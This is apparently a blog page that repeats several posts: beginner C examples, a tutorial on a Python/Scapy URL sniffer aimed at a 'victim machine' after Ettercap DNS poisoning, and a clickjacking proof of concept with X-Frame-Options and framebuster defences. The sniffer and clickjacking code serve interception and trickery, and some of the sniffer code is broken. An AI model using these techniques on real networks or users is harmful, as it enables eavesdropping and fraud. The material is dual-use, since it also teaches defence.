How to use comments

#include<stdio.h>
#include<conio.h>
main()
{
//clrscr();  //clears the screen
printf("This program explains comments"); /*how to use comment*/
}

Output:-This program explains comments
--------------------------------
Process exited after 0.01003 seconds with return value 0
Press any key to continue . . .

Explanation:-
// use for single line comment
/* use for multiple line comment*/
// clrscr(); not support in dev c++ compiler,defined in header file <conio.h>

Thank you

Read More

How to use comments

#include<stdio.h>
#include<conio.h>
main()
{
//clrscr();  //clears the screen
printf("This program explains comments"); /*how to use comment*/
}


Output:-This program explains comments
--------------------------------
Process exited after 0.01003 seconds with return value 0
Press any key to continue . . .

Explanation:-
// use for single line comment
/* use for multiple line comment*/
// clrscr(); not support in dev c++ compiler,defined in header file <conio.h>

Thank you

Read More

Write a program to display message

#include<stdio.h>
#include<conio.h>
main()
{
printf("Programmers World");
}


Output:-Programmers World
--------------------------------
Process exited after 0.02109 seconds with return value 0
Press any key to continue . . .

Explanation:-
/* This program displays the message PROGRAMMERS WORLD, Using the printf() statement*/

Read More

Write a program to display message

#include<stdio.h>
#include<conio.h>
main()
{
printf("Programmers World");
}


Output:-Programmers World
--------------------------------
Process exited after 0.02109 seconds with return value 0
Press any key to continue . . .

Explanation:-
/* This program displays the message PROGRAMMERS WORLD, Using the printf() statement*/

Read More

Developing a URL Sniffer in Python

URL Sniffer can be a handy tool for a security researcher, to extract information regarding the nature of data flow in a victim machine. It can be a useful aid to monitor the content being accessed on the victim machine. In this post we will describe the procedure to code a URL Sniffer in python 2.7, using Scapy library. We will further explain how you can build upon this tool to develop other exciting monitoring tools for your hacking arsenal.

Scapy

Let’s begin with understanding of Scapy library in python. This library is like a swiss army knife for security researchers and network programmers, with plethora of functions to play with network layers. This is a packet manipulation library to forge, sniff and transmit packets. It can easily replace upto 85% of nmap, hping, arpspoof, arp-sk, arping, tcpdump, tethereal, p0f, etc. In this post we will leverage Scapy to manipulate HTTP layer and sniff the URLs being accessed in the victim machine. You can install scapy easily by using following commands:

$ pip install scapy

$ pip install scapy-http

Man In The Middle

The next step after installing Scapy is to do DNS cache poisoning using tools like Ettercap to perform Man in the Middle attack. This will overwrite the cache and the victim machine will consider our machine to be the default gateway. This activity will ensure that the data going in and out of the victim machine will route through our machine. Now, we need to sniff the packets from the victim machine to extract URLs.

Figure 1: DNS cache poisoning using Ettercap

After Man in The Middle attack, we can develop the sniffer and read the packets.

Sniffer Development

First import all the required modules from Scapy library.

from scapy.all import IP

from scapy.all import sniff

from scapy.layers import http

• IP module is used for manipulation of IP packets.
• Sniff module contains methods for sniffing different types of packets like TCP, UDP, DHCP etc.
• Http module is used for manipulation of HTTP packets.

After importing all the required modules, now we will write the sniffer module to extract URLs.

def sniff_urls(packet):

   if packet.haslayer(http.HTTPRequest):

http_layer = packet.getlayer(http.HTTPRequest)

ip_layer = packet.getlayer(IP)

print '\n{0[src]} - {1[Method]} - http://{1[Host]}{1[Path]}'.format(ip_layer.fields,http_layer.fields)

This method initially applies the filter to sniff all the HTTP requests. Then it extracts the data from the packet’s IP layer which has the URLs. and finally it prints all the URLs on the screen. After this we will start the sniffer.

sniff(filter='tcp', prn=sniff_urls)

The sniff method starts the sniffer and it has two parameters:

• filter: This will extract all the TCP packets from the captured data.
• prn: This will use the sniff_urls method to display the required information (URLs) from the captured TCP packets.

The final sniffer code looks like:

from scapy.all import IP

from scapy.all import sniff

from scapy.layers import http

# Extracting all URLS

def sniff_urls(packet):

   if packet.haslayer(http.HTTPRequest):

http_layer = packet.getlayer(http.HTTPRequest)

ip_layer = packet.getlayer(IP)

print '\n{0[src]} - {1[Method]} - http://{1[Host]}{1[Path]}'.format(ip_layer.fields, http_layer.fields)

# Start sniffing the network.

sniff(filter='tcp', prn=sniff_urls)

After, this when we run the sniffer sample output is generated as shown.

Figure 2: Sniffed URLs

Way Forward

This simple yet effective tool can easily be used for monitoring purpose can be hacked together within 30 minutes or so. Moreover, this tool can be further extended to sniff several other requests like DHCP, UDP, sensitive credentials etc. It can also be used to display / save the images being viewed by the victim (just like your own Driftnet) using something like the below code snippet.

import urllib

urllib.urlretrieve('http://{1[Host]}{1[Path]}'.format(ip_layer.fields, http_layer.fields, “img_name.png”)

Thanks

Read More

Developing a URL Sniffer in Python

URL Sniffer can be a handy tool for a security researcher, to extract information regarding the nature of data flow in a victim machine. It can be a useful aid to monitor the content being accessed on the victim machine. In this post we will describe the procedure to code a URL Sniffer in python 2.7, using Scapy library. We will further explain how you can build upon this tool to develop other exciting monitoring tools for your hacking arsenal.

Scapy

Let’s begin with understanding of Scapy library in python. This library is like a swiss army knife for security researchers and network programmers, with plethora of functions to play with network layers. This is a packet manipulation library to forge, sniff and transmit packets. It can easily replace upto 85% of nmap, hping, arpspoof, arp-sk, arping, tcpdump, tethereal, p0f, etc. In this post we will leverage Scapy to manipulate HTTP layer and sniff the URLs being accessed in the victim machine. You can install scapy easily by using following commands:

$ pip install scapy

$ pip install scapy-http

Man In The Middle

The next step after installing Scapy is to do DNS cache poisoning using tools like Ettercap to perform Man in the Middle attack. This will overwrite the cache and the victim machine will consider our machine to be the default gateway. This activity will ensure that the data going in and out of the victim machine will route through our machine. Now, we need to sniff the packets from the victim machine to extract URLs.

Figure 1: DNS cache poisoning using Ettercap

After Man in The Middle attack, we can develop the sniffer and read the packets.

Sniffer Development

First import all the required modules from Scapy library.

from scapy.all import IP

from scapy.all import sniff

from scapy.layers import http

• IP module is used for manipulation of IP packets.
• Sniff module contains methods for sniffing different types of packets like TCP, UDP, DHCP etc.
• Http module is used for manipulation of HTTP packets.

After importing all the required modules, now we will write the sniffer module to extract URLs.

def sniff_urls(packet):

   if packet.haslayer(http.HTTPRequest):

http_layer = packet.getlayer(http.HTTPRequest)

ip_layer = packet.getlayer(IP)

print '\n{0[src]} - {1[Method]} - http://{1[Host]}{1[Path]}'.format(ip_layer.fields,http_layer.fields)

This method initially applies the filter to sniff all the HTTP requests. Then it extracts the data from the packet’s IP layer which has the URLs. and finally it prints all the URLs on the screen. After this we will start the sniffer.

sniff(filter='tcp', prn=sniff_urls)

The sniff method starts the sniffer and it has two parameters:

• filter: This will extract all the TCP packets from the captured data.
• prn: This will use the sniff_urls method to display the required information (URLs) from the captured TCP packets.

The final sniffer code looks like:

from scapy.all import IP

from scapy.all import sniff

from scapy.layers import http

# Extracting all URLS

def sniff_urls(packet):

   if packet.haslayer(http.HTTPRequest):

http_layer = packet.getlayer(http.HTTPRequest)

ip_layer = packet.getlayer(IP)

print '\n{0[src]} - {1[Method]} - http://{1[Host]}{1[Path]}'.format(ip_layer.fields, http_layer.fields)

# Start sniffing the network.

sniff(filter='tcp', prn=sniff_urls)

After, this when we run the sniffer sample output is generated as shown.

Figure 2: Sniffed URLs

Way Forward

This simple yet effective tool can easily be used for monitoring purpose can be hacked together within 30 minutes or so. Moreover, this tool can be further extended to sniff several other requests like DHCP, UDP, sensitive credentials etc. It can also be used to display / save the images being viewed by the victim (just like your own Driftnet) using something like the below code snippet.

import urllib

urllib.urlretrieve('http://{1[Host]}{1[Path]}'.format(ip_layer.fields, http_layer.fields, “img_name.png”)

Thanks

Read More

Clickjacking Attack and Protection for Developers

Clickjacking is a technique which uses some transparent or opaque layers by which a user can be tricked to click on a hidden button/link them in a web page.  By clicking on this user will route/redirect to malicious links.
Different sorts of clickjacking enable hackers to trap clients into doing things like changing a status on Facebook or sending cash to their accounts.Clickjacking also called as "User Interface redress attack", "UI redress attack", or just "UI redressing".

This kind of attack is prevalent in bank frauds. In this article we will analyze the POC of clickjacking and also ways to remediate this vulnerability. To carry out this type of technique the attacker has to create a seemingly harmless web page that loads the target application through the use of an iframe (suitably concealed with CSS code). Once this is done, the attacker could induce the victim to interact with his fictitious web page by other means (through, for example, social engineering). Like other attacks, a common prerequisite is that the victim is authenticated against the attacker’s target website.

Proof of Concept:

For performing the proof of concept for clickjacking we need to have a basic understanding of basic HTML. In this POC we will create 2 HTML pages. First page would contain a message saying that “click here to win the prize”. This would seem like a harmless page which is giving users a chance to win a prize on click of a button. However, masquerading behind this page is the malicious page loaded in an iframe, hence, on click of the button (which user thinks is for winning the prize) the attacker can mislead the user to perform activities like transferring of funds to malicious accounts, downloading viruses etc. So now let’s start with the POC.

Step 1: We require 3 computers in  the same network for this POC (it can be quite easily done in a single machine or by using VMs too). Setup Apache web server in the computers A and B, to host the web pages. Let the computer C be the machine of unsuspecting user who will be victim of this POC. To install apache use following commands:

sudo apt-get install apache2

sudo service apache2 start

Step 2: Now let’s craft a Bank transaction page, which has a button to transfer 10 Million dollars from the account of the victim to the account of attacker. Host this page on machine A.

The basic HTML code for this page is (bank.html): <html> <form action="/jack.html"> Transfer 10 Million Dollars to XYZ Bank <input type="submit" value="Yes"> </form> </html>

Step 3: On clicking this “YES” button in the Bank page, we will display a message that “You have been clickjacked!!!!!”. This page can be easily coded as (jack.html):

<html>

<br><br>You have been clickjacked!!!!!

</html>

This page is a part of Bank website and will also be hosted on the machine A.

Step 4: Now we will craft the page to trap the victims. First let’s start by loading the Bank website in the iframe.

<html>

   <head>

   </head>

     <body>

        <p> Congrats you are one of the lucky winners!!!</p>

    <div id='clickjack'>

         <iframe src="http://<ip address of machine A>/bank.html" width="326" height="70"  frameBorder="0"></iframe>

   </div>

   </body>

</html>

This page will look like the one below:

Here, we have loaded the Bank.html in another Attack.html page in an iframe and we have removed the iframe border using frameBorder="0" option. This looks like the part of same page. Now using CSS we will create a trap. Step 5: After implementing CSS the Attack.html page looks like the one below:

Here we have hidden the true alert message of the Bank with a hoax prize message, but we have left the button as it is for the victim user to click. Now, this web page will be hosted in the computer B. The final code of this Attack.html is:

<html>
   <head>
   </head>
   <style>
   #clickjack{
    opacity:0.8;
    }
   #over { font-size:30px; position:absolute; top:45px; left:16px; z-index:2 }
   </style>
   <body>
<p> Congrats you are one of the lucky winners!!!</p>
    <div id='clickjack'>
 <iframe src="http://<ip address of the machine A>/bank.html" width="326" height="70" frameBorder="0"></iframe>
  <div id="over"><mark>click here to win prize</blink></div>
  </div>
   </body>

</html>



Step 6: Now the victim user from his/her system (machine C) will go to the Attack.html and click the “YES” button to “win the prize”, the result however would be:

This simple POC is enough to explain how easily a user can be trapped on the internet and now we will discuss the methodologies required to prevent this type attack.



Remediation:
Now the question is how can we remediate Clickjacking on our webpages?
There are several ways to prevent Clickjacking but the most well known approach against Clickjacking is to allow a type of "frame-breaking" which keeps other website pages from framing the webpage you wish to protect.
So, we will discuss about two methods to implement frame-breaking.
X-Frame-Options

Javascript frame-breaking script (Framebuster)


X-Frame-Options

The X-Frame-Options HTTP response header can be used to indicate whether or not a browser should be allowed to render a page in a <frame>, <iframe> or <object> . Sites can use this to avoid clickjacking attacks, by ensuring that their content is not embedded into other sites.
The added security is only provided if the user accessing the document is using a browser supporting X-Frame-Options.

Configuring Apache           

To configure Apache to send the X-Frame-Options header for all pages, add this to your site's configuration:

Header always set X-Frame-Options SAMEORIGIN

To configure Apache to set the X-Frame-Options  deny , add this to your site's configuration:
Header set X-Frame-Options DENY

To configure Apache to set the X-Frame-Options  to ALLOW-FROM a specific Host , add this to your site's configuration:
Header set X-Frame-Options "ALLOW-FROM https://example.com/"


Configuring nginx                               

To configure nginx to send the X-Frame-Options header, add this either to your http, server or location configuration:

add_header X-Frame-Options SAMEORIGI N;Javascript Frame Breaking script (Framebuster)
Frame busting can be achieved with a simple javascript technique. For Example:

 <script type="text/javascript">
if (top !== self) top.location.replace(self.location.href);

</script>

Thank u

Read More